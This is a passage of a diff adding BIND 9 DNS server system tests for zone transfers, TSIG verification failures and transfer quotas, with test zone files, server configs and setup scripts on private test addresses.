dig.out.soa1.ns6.test$n + grep "1397051953" dig.out.soa1.ns6.test$n > /dev/null || return 1 + $DIG $DIGOPTS @10.53.0.1 +noall +answer soa secondary > dig.out.soa2.ns1.test$n + grep "1397051953" dig.out.soa2.ns1.test$n > /dev/null || return 1 + $DIG $DIGOPTS @10.53.0.2 +noall +answer soa example > dig.out.soa3.ns2.test$n + grep "1397051953" dig.out.soa3.ns2.test$n > /dev/null || return 1 + return 0 +) +retry_quiet 20 wait_for_reloads || tmp=1 + +echo_i "wait for transfers..." +wait_for_transfers() ( + a=0 b=0 c=0 d=0 + $DIG $DIGOPTS @10.53.0.3 +noall +answer soa example > dig.out.soa1.ns3.test$n + grep "1397051953" dig.out.soa1.ns3.test$n > /dev/null && a=1 + $DIG $DIGOPTS @10.53.0.3 +noall +answer soa primary > dig.out.soa2.ns3.test$n + grep "1397051953" dig.out.soa2.ns3.test$n > /dev/null && b=1 + $DIG $DIGOPTS @10.53.0.6 +noall +answer soa secondary > dig.out.soa3.ns6.test$n + grep "1397051953" dig.out.soa3.ns6.test$n > /dev/null && c=1 + [ $a -eq 1 -a $b -eq 1 -a $c -eq 1 ] && return 0 + + # re-notify if necessary + $RNDCCMD 10.53.0.6 notify primary 2>&1 | sed 's/^/ns6 /' | cat_i + $RNDCCMD 10.53.0.1 notify secondary 2>&1 | sed 's/^/ns1 /' | cat_i + $RNDCCMD 10.53.0.2 notify example 2>&1 | sed 's/^/ns2 /' | cat_i + return 1 +) +retry_quiet 20 wait_for_transfers || tmp=1 + +$DIG $DIGOPTS example. \ + @10.53.0.3 axfr > dig.out.ns3.test$n || tmp=1 +grep "^;" dig.out.ns3.test$n | cat_i + +digcomp dig2.good dig.out.ns3.test$n || tmp=1 + +# ns3 has a journal iff it received an IXFR. +test -f ns3/example.bk || tmp=1 +test -f ns3/example.bk.jnl || tmp=1 + +if test $tmp != 0 ; then echo_i "failed"; fi +status=$((status+tmp)) + +n=$((n+1)) +echo_i "testing ixfr-from-differences primary; (primary zone) ($n)" +tmp=0 + +$DIG $DIGOPTS primary. \ + @10.53.0.6 axfr > dig.out.ns6.test$n || tmp=1 +grep "^;" dig.out.ns6.test$n | cat_i + +$DIG $DIGOPTS primary. \ + @10.53.0.3 axfr > dig.out.ns3.test$n || tmp=1 +grep "^;" dig.out.ns3.test$n > /dev/null && cat_i dig.out.ns3.test$n + +digcomp dig.out.ns6.test$n dig.out.ns3.test$n || tmp=1 + +# ns3 has a journal iff it received an IXFR. +test -f ns3/primary.bk || tmp=1 +test -f ns3/primary.bk.jnl || tmp=1 + +if test $tmp != 0 ; then echo_i "failed"; fi +status=$((status+tmp)) + +n=$((n+1)) +echo_i "testing ixfr-from-differences primary; (secondary zone) ($n)" +tmp=0 + +$DIG $DIGOPTS secondary. \ + @10.53.0.6 axfr > dig.out.ns6.test$n || tmp=1 +grep "^;" dig.out.ns6.test$n | cat_i + +$DIG $DIGOPTS secondary. \ + @10.53.0.1 axfr > dig.out.ns1.test$n || tmp=1 +grep "^;" dig.out.ns1.test$n | cat_i + +digcomp dig.out.ns6.test$n dig.out.ns1.test$n || tmp=1 + +# ns6 has a journal iff it received an IXFR. +test -f ns6/sec.bk || tmp=1 +test -f ns6/sec.bk.jnl && tmp=1 + +if test $tmp != 0 ; then echo_i "failed"; fi +status=$((status+tmp)) + +n=$((n+1)) +echo_i "testing ixfr-from-differences secondary; (secondary zone) ($n)" +tmp=0 + +# ns7 has a journal iff it generates an IXFR. +test -f ns7/primary2.db || tmp=1 +test -f ns7/primary2.db.jnl && tmp=1 + +if test $tmp != 0 ; then echo_i "failed"; fi +status=$((status+tmp)) + +n=$((n+1)) +echo_i "testing ixfr-from-differences secondary; (secondary zone) ($n)" +tmp=0 + +$DIG $DIGOPTS secondary. \ + @10.53.0.1 axfr > dig.out.ns1.test$n || tmp=1 +grep "^;" dig.out.ns1.test$n | cat_i + +$DIG $DIGOPTS secondary. \ + @10.53.0.7 axfr > dig.out.ns7.test$n || tmp=1 +grep "^;" dig.out.ns7.test$n | cat_i + +digcomp dig.out.ns7.test$n dig.out.ns1.test$n || tmp=1 + +# ns7 has a journal iff it generates an IXFR. +test -f ns7/sec.bk || tmp=1 +test -f ns7/sec.bk.jnl || tmp=1 + +if test $tmp != 0 ; then echo_i "failed"; fi +status=$((status+tmp)) + +n=$((n+1)) +echo_i "check that a multi-message uncompressable zone transfers ($n)" +$DIG axfr . -p ${PORT} @10.53.0.4 | grep SOA > axfr.out +if test `wc -l < axfr.out` != 2 +then + echo_i "failed" + status=$((status+1)) +fi + +# now we test transfers with assorted TSIG glitches +DIGCMD="$DIG $DIGOPTS @10.53.0.4" +SENDCMD="$PERL ../send.pl 10.53.0.5 $EXTRAPORT1" + +echo_i "testing that incorrectly signed transfers will fail..." +n=$((n+1)) +echo_i "initial correctly-signed transfer should succeed ($n)" + +$SENDCMD < ans5/goodaxfr + +# Initially, ns4 is not authoritative for anything. +# Now that ans is up and running with the right data, we make ns4 +# a secondary for nil. + +cat <<EOF >>ns4/named.conf +zone "nil" { + type secondary; + file "nil.db"; + primaries { 10.53.0.5 key tsig_key; }; +}; +EOF + +nextpart ns4/named.run >/dev/null + +rndc_reload ns4 10.53.0.4 + +wait_for_soa() ( + $DIGCMD nil. SOA > dig.out.ns4.test$n + grep SOA dig.out.ns4.test$n > /dev/null +) +retry_quiet 10 wait_for_soa + +nextpart ns4/named.run | grep "Transfer status: success" > /dev/null || { + echo_i "failed: expected status was not logged" + status=$((status+1)) +} + +$DIGCMD nil. TXT | grep 'initial AXFR' >/dev/null || { + echo_i "failed" + status=$((status+1)) +} + +n=$((n+1)) +echo_i "unsigned transfer ($n)" + +$SENDCMD < ans5/unsigned + +$RNDCCMD 10.53.0.4 retransfer nil | sed 's/^/ns4 /' | cat_i + +sleep 2 + +nextpart ns4/named.run | grep "Transfer status: expected a TSIG or SIG(0)" > /dev/null || { + echo_i "failed: expected status was not logged" + status=$((status+1)) +} + +$DIGCMD nil. TXT | grep 'unsigned AXFR' >/dev/null && { + echo_i "failed" + status=$((status+1)) +} + +n=$((n+1)) +echo_i "bad keydata ($n)" + +$SENDCMD < ans5/badkeydata + +$RNDCCMD 10.53.0.4 retransfer nil | sed 's/^/ns4 /' | cat_i + +sleep 2 + +nextpart ns4/named.run | grep "Transfer status: tsig verify failure" > /dev/null || { + echo_i "failed: expected status was not logged" + status=$((status+1)) +} + +$DIGCMD nil. TXT | grep 'bad keydata AXFR' >/dev/null && { + echo_i "failed" + status=$((status+1)) +} + +n=$((n+1)) +echo_i "partially-signed transfer ($n)" + +$SENDCMD < ans5/partial + +$RNDCCMD 10.53.0.4 retransfer nil | sed 's/^/ns4 /' | cat_i + +sleep 2 + +nextpart ns4/named.run | grep "Transfer status: expected a TSIG or SIG(0)" > /dev/null || { + echo_i "failed: expected status was not logged" + status=$((status+1)) +} + +$DIGCMD nil. TXT | grep 'partially signed AXFR' >/dev/null && { + echo_i "failed" + status=$((status+1)) +} + +n=$((n+1)) +echo_i "unknown key ($n)" + +$SENDCMD < ans5/unknownkey + +$RNDCCMD 10.53.0.4 retransfer nil | sed 's/^/ns4 /' | cat_i + +sleep 2 + +nextpart ns4/named.run | grep "tsig key 'tsig_key': key name and algorithm do not match" > /dev/null || { + echo_i "failed: expected status was not logged" + status=$((status+1)) +} + +$DIGCMD nil. TXT | grep 'unknown key AXFR' >/dev/null && { + echo_i "failed" + status=$((status+1)) +} + +n=$((n+1)) +echo_i "incorrect key ($n)" + +$SENDCMD < ans5/wrongkey + +$RNDCCMD 10.53.0.4 retransfer nil | sed 's/^/ns4 /' | cat_i + +sleep 2 + +nextpart ns4/named.run | grep "tsig key 'tsig_key': key name and algorithm do not match" > /dev/null || { + echo_i "failed: expected status was not logged" + status=$((status+1)) +} + +$DIGCMD nil. TXT | grep 'incorrect key AXFR' >/dev/null && { + echo_i "failed" + status=$((status+1)) +} + +n=$((n+1)) +echo_i "bad message id ($n)" + +$SENDCMD < ans5/badmessageid + +# Uncomment to see AXFR stream with mismatching IDs. +# $DIG $DIGOPTS @10.53.0.5 -y tsig_key:LSAnCU+Z nil. AXFR +all + +$RNDCCMD 10.53.0.4 retransfer nil | sed 's/^/ns4 /' | cat_i + +sleep 2 + +msg="detected message ID mismatch on incoming AXFR stream, transfer will fail in BIND 9.17.2 and later if AXFR source is not fixed" +nextpart ns4/named.run | grep "$msg" > /dev/null || { + echo_i "failed: expected status was not logged" + status=$((status+1)) +} + +$DIGCMD nil. TXT | grep 'bad message id' >/dev/null || { + echo_i "failed" + status=$((status+1)) +} + +n=$((n+1)) +echo_i "mismatched SOA ($n)" + +${SENDCMD} < ans5/soamismatch + +$RNDCCMD 10.53.0.4 retransfer nil | sed 's/^/ns4 /' | cat_i + +sleep 2 + +nextpart ns4/named.run | grep "Transfer status: FORMERR" > /dev/null || { + echo_i "failed: expected status was not logged" + status=$((status+1)) +} + +$DIGCMD nil. TXT | grep 'SOA mismatch AXFR' >/dev/null && { + echo_i "failed" + status=$((status+1)) +} + +n=$((n+1)) +echo_i "check that we ask for and get a EDNS EXPIRE response ($n)" +# force a refresh query +$RNDCCMD 10.53.0.7 refresh edns-expire 2>&1 | sed 's/^/ns7 /' | cat_i +sleep 10 + +# there may be multiple log entries so get the last one. +expire=`awk '/edns-expire\/IN: got EDNS EXPIRE of/ { x=$9 } END { print x }' ns7/named.run` +test ${expire:-0} -gt 0 -a ${expire:-0} -lt 1814400 || { + echo_i "failed (expire=${expire:-0})" + status=$((status+1)) +} + +n=$((n+1)) +echo_i "test smaller transfer TCP message size ($n)" +$DIG $DIGOPTS example. @10.53.0.8 axfr \ + -y key1.:1234abcd8765 > dig.out.msgsize.test$n || status=1 + +$DOS2UNIX dig.out.msgsize.test$n >/dev/null 2>&1 + +bytes=`wc -c < dig.out.msgsize.test$n` +if [ $bytes -ne 459357 ]; then + echo_i "failed axfr size check" + status=$((status+1)) +fi + +num_messages=`cat ns8/named.run | grep "sending TCP message of" | wc -l` +if [ $num_messages -le 300 ]; then + echo_i "failed transfer message count check" + status=$((status+1)) +fi + +n=$((n+1)) +echo_i "test mapped zone with out of zone data ($n)" +tmp=0 +$DIG -p ${PORT} txt mapped @10.53.0.3 > dig.out.1.test$n +grep "status: NOERROR," dig.out.1.test$n > /dev/null || tmp=1 +stop_server ns3 +start_server --noclean --restart --port ${PORT} ns3 +check_mapped () { + $DIG -p ${PORT} txt mapped @10.53.0.3 > dig.out.2.test$n + grep "status: NOERROR," dig.out.2.test$n > /dev/null || return 1 + $DIG -p ${PORT} axfr mapped @10.53.0.3 > dig.out.3.test$n + digcomp knowngood.mapped dig.out.3.test$n || return 1 + return 0 +} +retry_quiet 10 check_mapped || tmp=1 +[ "$tmp" -ne 0 ] && echo_i "failed" +status=$((status+tmp)) + +n=$((n+1)) +echo_i "test that a zone with too many records is rejected (AXFR) ($n)" +tmp=0 +grep "'axfr-too-big/IN'.*: too many records" ns6/named.run >/dev/null || tmp=1 +if test $tmp != 0 ; then echo_i "failed"; fi +status=$((status+tmp)) + +n=$((n+1)) +echo_i "test that a zone with too many records is rejected (IXFR) ($n)" +tmp=0 +nextpart ns6/named.run > /dev/null +$NSUPDATE << EOF +zone ixfr-too-big +server 10.53.0.1 ${PORT} +update add the-31st-record.ixfr-too-big 0 TXT this is it +send +EOF +msg="'ixfr-too-big/IN' from 10.53.0.1#${PORT}: Transfer status: too many records" +wait_for_log 10 "$msg" ns6/named.run || tmp=1 +if test $tmp != 0 ; then echo_i "failed"; fi +status=$((status+tmp)) + +n=$((n+1)) +echo_i "checking whether dig calculates AXFR statistics correctly ($n)" +tmp=0 +# Loop until the secondary server manages to transfer the "xfer-stats" zone so +# that we can both check dig output and immediately proceed with the next test. +# Use -b so that we can discern between incoming and outgoing transfers in ns3 +# logs later on. +wait_for_xfer() ( + $DIG $DIGOPTS +noedns +stat -b 10.53.0.2 @10.53.0.3 xfer-stats. AXFR > dig.out.ns3.test$n + grep "; Transfer failed" dig.out.ns3.test$n > /dev/null || return 0 + return 1 +) +if retry_quiet 10 wait_for_xfer; then + get_dig_xfer_stats dig.out.ns3.test$n > stats.dig + diff axfr-stats.good stats.dig || tmp=1 +else + echo_i "timed out waiting for zone transfer" +fi +if test $tmp != 0 ; then echo_i "failed"; fi +status=$((status+tmp)) + +# Note: in the next two tests, we use ns3 logs for checking both incoming and +# outgoing transfer statistics as ns3 is both a secondary server (for ns1) and a +# primary server (for dig queries from the previous test) for "xfer-stats". +n=$((n+1)) +echo_i "checking whether named calculates incoming AXFR statistics correctly ($n)" +tmp=0 +get_named_xfer_stats ns3/named.run 10.53.0.1 xfer-stats "Transfer completed" > stats.incoming +diff axfr-stats.good stats.incoming || tmp=1 +if test $tmp != 0 ; then echo_i "failed"; fi +status=$((status+tmp)) + +n=$((n+1)) +echo_i "checking whether named calculates outgoing AXFR statistics correctly ($n)" +tmp=0 +check_xfer_stats() { + get_named_xfer_stats ns3/named.run 10.53.0.2 xfer-stats "AXFR ended" > stats.outgoing + diff axfr-stats.good stats.outgoing > /dev/null +} +retry_quiet 10 check_xfer_stats || tmp=1 +if test $tmp != 0 ; then echo_i "failed"; fi +status=$((status+tmp)) + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/xferquota/clean.sh b/bin/tests/system/xferquota/clean.sh new file mode 100644 index 0000000..9cc4057 --- /dev/null +++ b/bin/tests/system/xferquota/clean.sh @@ -0,0 +1,26 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Clean up after zone transfer quota tests. +# + +rm -f ns1/zone*.example.db ns1/zones.conf +rm -f ns2/zone*.example.bk ns2/zones.conf +rm -f dig.out.* ns2/changing.bk +rm -f ns1/changing.db +rm -f */named.memstats +rm -f */named.conf +rm -f */named.run +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/xferquota/ns1/changing1.db b/bin/tests/system/xferquota/ns1/changing1.db new file mode 100644 index 0000000..0b5e893 --- /dev/null +++ b/bin/tests/system/xferquota/ns1/changing1.db @@ -0,0 +1,27 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 + +@ IN SOA dns1.changing. postmaster.changing. ( + 1 ;; serial + 3600 ;; refresh period + 1800 ;; retry interval + 604800 ;; expire time + 600 ) ;; default TTL + + IN NS dns1.changing. + NS dns2.changing. + +dns1 IN A 10.53.0.1 +dns2 IN A 10.53.0.2 + +a IN A 10.0.0.1 diff --git a/bin/tests/system/xferquota/ns1/changing2.db b/bin/tests/system/xferquota/ns1/changing2.db new file mode 100644 index 0000000..33dd7f4 --- /dev/null +++ b/bin/tests/system/xferquota/ns1/changing2.db @@ -0,0 +1,27 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 600 + +@ IN SOA dns1.changing. postmaster.changing. ( + 2 ;; serial + 3600 ;; refresh period + 1800 ;; retry interval + 604800 ;; expire time + 600 ) ;; default TTL + + IN NS dns1.changing. + NS dns2.changing. + +dns1 IN A 10.53.0.1 +dns2 IN A 10.53.0.2 + +a IN A 10.0.0.2 diff --git a/bin/tests/system/xferquota/ns1/named.conf.in b/bin/tests/system/xferquota/ns1/named.conf.in new file mode 100644 index 0000000..c9f19f9 --- /dev/null +++ b/bin/tests/system/xferquota/ns1/named.conf.in @@ -0,0 +1,45 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { + type primary; + file "root.db"; +}; + +zone "changing." { + type primary; + file "changing.db"; +}; + +include "zones.conf"; diff --git a/bin/tests/system/xferquota/ns1/root.db b/bin/tests/system/xferquota/ns1/root.db new file mode 100644 index 0000000..c5049f4 --- /dev/null +++ b/bin/tests/system/xferquota/ns1/root.db @@ -0,0 +1,29 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 +. IN SOA gson.nominum.com. a.root.servers.nil. ( + 2000042100 ; serial + 600 ; refresh + 600 ; retry + 1200 ; expire + 600 ; minimum + ) +. NS a.root-servers.nil. +a.root-servers.nil. A 10.53.0.1 + +example. NS ns2.example. +ns2.example. A 10.53.0.2 + +changing. NS dns1.changing. + A 10.53.0.1 + NS dns2.changing. + A 10.53.0.2 diff --git a/bin/tests/system/xferquota/ns2/example.db b/bin/tests/system/xferquota/ns2/example.db new file mode 100644 index 0000000..e1d2b82 --- /dev/null +++ b/bin/tests/system/xferquota/ns2/example.db @@ -0,0 +1,146 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN . +$TTL 300 ; 5 minutes +example IN SOA mname1. . ( + 2000042795 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +example. NS ns2.example. +ns2.example. A 10.53.0.2 +example. NS ns3.example. +ns3.example. A 10.53.0.3 + +$ORIGIN example. +* MX 10 mail +a TXT "foo foo foo" + PTR foo.net. +$TTL 3600 ; 1 hour +a01 A 0.0.0.0 +a02 A 255.255.255.255 +a601 AAAA ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff +afsdb01 AFSDB 0 hostname +afsdb02 AFSDB 65535 . +$TTL 300 ; 5 minutes +b CNAME foo.net. +c A 73.80.65.49 +$TTL 3600 ; 1 hour +cert01 CERT 65534 65535 PRIVATEOID ( + MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgi + WCn/GxHhai6VAuHAoNUz4YoU1tVfSCSqQYn6//11U6Nl + d80jEeC8aTrO+KKmCaY= ) +cname01 CNAME cname-target. +cname02 CNAME cname-target +cname03 CNAME . +$TTL 300 ; 5 minutes +d A 73.80.65.49 +$TTL 3600 ; 1 hour +dname01 DNAME dname-target. +dname02 DNAME dname-target +dname03 DNAME . +$TTL 300 ; 5 minutes +e MX 10 mail + TXT "one" + TXT "three" + TXT "two" + A 73.80.65.49 + A 73.80.65.50 + A 73.80.65.52 + A 73.80.65.51 +f A 73.80.65.52 +$TTL 3600 ; 1 hour +gpos01 GPOS "-22.6882" "116.8652" "250.0" +gpos02 GPOS "" "" "" +hinfo01 HINFO "Generic PC clone" "NetBSD-1.4" +hinfo02 HINFO "PC" "NetBSD" +isdn01 ISDN "isdn-address" +isdn02 ISDN "isdn-address" "subaddress" +isdn03 ISDN "isdn-address" +isdn04 ISDN "isdn-address" "subaddress" +dnskey01 DNSKEY 512 255 1 ( + AQMFD5raczCJHViKtLYhWGz8hMY9UGRuniJDBzC7w0aR + yzWZriO6i2odGWWQVucZqKVsENW91IOW4vqudngPZsY3 + GvQ/xVA8/7pyFj6b7Esga60zyGW6LFe9r8n6paHrlG5o + jqf0BaqHT+8= ) +kx01 KX 10 kdc +kx02 KX 10 . +loc01 LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +loc02 LOC 60 9 0.000 N 24 39 0.000 E 10.00m 20m 2000m 20m +mb01 MG madname +mb02 MG . +mg01 MG mgmname +mg02 MG . +minfo01 MINFO rmailbx emailbx +minfo02 MINFO . . +mr01 MR mrname +mr02 MR . +mx01 MX 10 mail +mx02 MX 10 . +naptr01 NAPTR 0 0 "" "" "" . +naptr02 NAPTR 65535 65535 "blurgh" "blorf" ":(.*):\\1:" foo. +nsap-ptr01 NSAP-PTR foo. + NSAP-PTR . +nsap01 NSAP 0x47000580005a0000000001e133ffffff00016100 +nsap02 NSAP 0x47000580005a0000000001e133ffffff00016100 +nsec01 NSEC a.secure ( NS SOA MX RRSIG DNSKEY LOC NSEC ) +nsec02 NSEC . ( NSAP-PTR NSEC ) +nsec03 NSEC . ( A ) +nsec04 NSEC . ( 127 ) +ptr01 PTR example. +px01 PX 65535 foo. bar. +px02 PX 65535 . . +rp01 RP mbox-dname txt-dname +rp02 RP . . +rt01 RT 0 intermediate-host +rt02 RT 65535 . +$TTL 300 ; 5 minutes +s NS ns.s +$ORIGIN s.example. +ns A 73.80.65.49 +$ORIGIN example. +$TTL 3600 ; 1 hour +rrsig01 RRSIG NSEC 1 3 3600 20000102030405 ( + 19961211100908 2143 foo + MxFcby9k/yvedMfQgKzhH5er0Mu/vILz45IkskceFGgi + WCn/GxHhai6VAuHAoNUz4YoU1tVfSCSqQYn6//11U6Nl + d80jEeC8aTrO+KKmCaY= ) +srv01 SRV 0 0 0 . +srv02 SRV 65535 65535 65535 old-slow-box.example.com. +$TTL 301 ; 5 minutes 1 second +t A 73.80.65.49 +$TTL 3600 ; 1 hour +txt01 TXT "foo" +txt02 TXT "foo" "bar" +txt03 TXT "foo" +txt04 TXT "foo" "bar" +txt05 TXT "foo bar" +txt06 TXT "foo bar" +txt07 TXT "foo bar" +txt08 TXT "foo\010bar" +txt09 TXT "foo\010bar" +txt10 TXT "foo bar" +txt11 TXT "\"foo\"" +txt12 TXT "\"foo\"" +$TTL 300 ; 5 minutes +u TXT "txt-not-in-nsec" +$ORIGIN u.example. +a A 73.80.65.49 +b A 73.80.65.49 +$ORIGIN example. +$TTL 3600 ; 1 hour +wks01 WKS 10.0.0.1 6 ( 0 1 2 21 23 ) +wks02 WKS 10.0.0.1 17 ( 0 1 2 53 ) +wks03 WKS 10.0.0.2 6 ( 65535 ) +x2501 X25 "123456789" diff --git a/bin/tests/system/xferquota/ns2/named.conf.in b/bin/tests/system/xferquota/ns2/named.conf.in new file mode 100644 index 0000000..ef55dc6 --- /dev/null +++ b/bin/tests/system/xferquota/ns2/named.conf.in @@ -0,0 +1,40 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + notify no; + + transfers-in 5; + transfers-per-ns 5; +}; + +zone "." { + type hint; + file "../../common/root.hint"; +}; + +zone "changing." { + type secondary; + primaries { 10.53.0.1; }; + file "changing.bk"; +}; + +include "zones.conf"; diff --git a/bin/tests/system/xferquota/setup.pl b/bin/tests/system/xferquota/setup.pl new file mode 100644 index 0000000..ab5450c --- /dev/null +++ b/bin/tests/system/xferquota/setup.pl @@ -0,0 +1,40 @@ +#!/usr/bin/perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Set up test data for zone transfer quota tests. +# +use FileHandle; + +my $priconf = new FileHandle("ns1/zones.conf", "w") or die; +my $secconf = new FileHandle("ns2/zones.conf", "w") or die; + +for ($z = 0; $z < 300; $z++) { + my $zn = sprintf("zone%06d.example", $z); + print $priconf "zone \"$zn\" { type primary; file \"$zn.db\"; };\n"; + print $secconf "zone \"$zn\" { type secondary; file \"$zn.bk\"; masterfile-format text; primaries { 10.53.0.1; }; };\n"; + my $fn = "ns1/$zn.db"; + my $f = new FileHandle($fn, "w") or die "open: $fn: $!"; + print $f "\$TTL 300 +\@ IN SOA ns1 . 1 300 120 3600 86400 + NS ns1 + NS ns2 +ns1 A 10.53.0.1 +ns2 A 10.53.0.2 + MX 10 mail1.isp.example. + MX 20 mail2.isp.example. +www A 10.0.0.1 +xyzzy A 10.0.0.2 +"; + $f->close; +} diff --git a/bin/tests/system/xferquota/setup.sh b/bin/tests/system/xferquota/setup.sh new file mode 100644 index 0000000..c8c488d --- /dev/null +++ b/bin/tests/system/xferquota/setup.sh @@ -0,0 +1,26 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Set up test data for zone transfer quota tests. +# + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$PERL setup.pl + +cp -f ns1/changing1.db ns1/changing.db + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf diff --git a/bin/tests/system/xferquota/tests.sh b/bin/tests/system/xferquota/tests.sh new file mode 100755 index 0000000..d6e0544 --- /dev/null +++ b/bin/tests/system/xferquota/tests.sh @@ -0,0 +1,64 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+tcp +noadd +nosea +nostat +noquest +nocomm +nocmd -p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +# +# Perform tests +# + +count=0 +ticks=0 +while [ $count != 300 ]; do + if [ $ticks = 1 ]; then + echo_i "Changing test zone..." + cp -f ns1/changing2.db ns1/changing.db + if [ ! "$CYGWIN" ]; then + $KILL -HUP `cat ns1/named.pid` + else + rndc_reload ns1 10.53.0.1 + fi + fi + sleep 1 + ticks=`expr $ticks + 1` + seconds=`expr $ticks \* 1` + if [ $ticks = 360 ]; then + echo_i "Took too long to load zones" + exit 1 + fi + count=`cat ns2/zone*.bk | grep xyzzy | wc -l` + echo_i "Have $count zones up in $seconds seconds" +done + +status=0 + +$DIG $DIGOPTS zone000099.example. @10.53.0.1 axfr > dig.out.ns1 || status=1 + +$DIG $DIGOPTS zone000099.example. @10.53.0.2 axfr > dig.out.ns2 || status=1 + +digcomp dig.out.ns1 dig.out.ns2 || status=1 + +sleep 15 + +$DIG $DIGOPTS a.changing. @10.53.0.1 a > dig.out.ns1 || status=1 + +$DIG $DIGOPTS a.changing. @10.53.0.2 a > dig.out.ns2 || status=1 + +digcomp dig.out.ns1 dig.out.ns2 || status=1 + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/zero/ans5/ans.pl b/bin/tests/system/zero/ans5/ans.pl new file mode 100644 index 0000000..3ca1083 --- /dev/null +++ b/bin/tests/system/zero/ans5/ans.pl @@ -0,0 +1,81 @@ +#!/usr/bin/perl -w + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Don't respond if the "norespond" file exists; otherwise respond to +# any A or AAAA query. +# + +use IO::File; +use IO::Socket; +use Net::DNS; +use Net::DNS::Packet; + +my $localport = int($ENV{'PORT'}); +if (!$localport) { $localport = 5300; } + +my $sock = IO::Socket::INET->new(LocalAddr => "10.53.0.5", + LocalPort => $localport, Proto => "udp") or die "$!"; + +my $pidf = new IO::File "ans.pid", "w" or die 